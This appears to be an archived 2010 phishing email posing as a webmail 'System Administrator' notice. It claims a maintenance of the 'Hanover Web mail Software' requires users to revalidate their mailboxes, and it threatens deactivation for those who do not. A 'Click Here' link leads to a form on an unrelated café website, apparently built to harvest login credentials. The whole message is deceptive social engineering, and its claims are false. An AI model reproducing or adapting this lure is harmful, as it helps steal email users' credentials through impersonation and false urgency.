A Computer Database Maintenance

To: <info@xxxxxxxxxxx>
Subject: A Computer Database Maintenance
From: "Morlino, Nicolas" <Nicolas.Morlino@xxxxxx>
Date: Thu, 12 Aug 2010 15:14:44 +0100
A Computer Database Maintenance is currently going on our Webmail

Message center. Our Message Center needs to be re-set

Because of the high amount of spam mails we receive daily. A

Quarantine Maintenance will help us prevent this everyday dilemma.

The new Hanover Web mail Software provide a pop - off block of some

Restricted words and spam terms.

To revalidate your mailbox

Click Here <http://cocomokacafe.com/formgenerator/use/BP/form1.html>

The Hanover Web mail Software is a fast and light weight application

to quickly and easily access your e-mail.

Failure to revalidate your mailbox will render your e-mail in-active

from our database.

Thanks

System Administrator

The new Hanover Web mail Software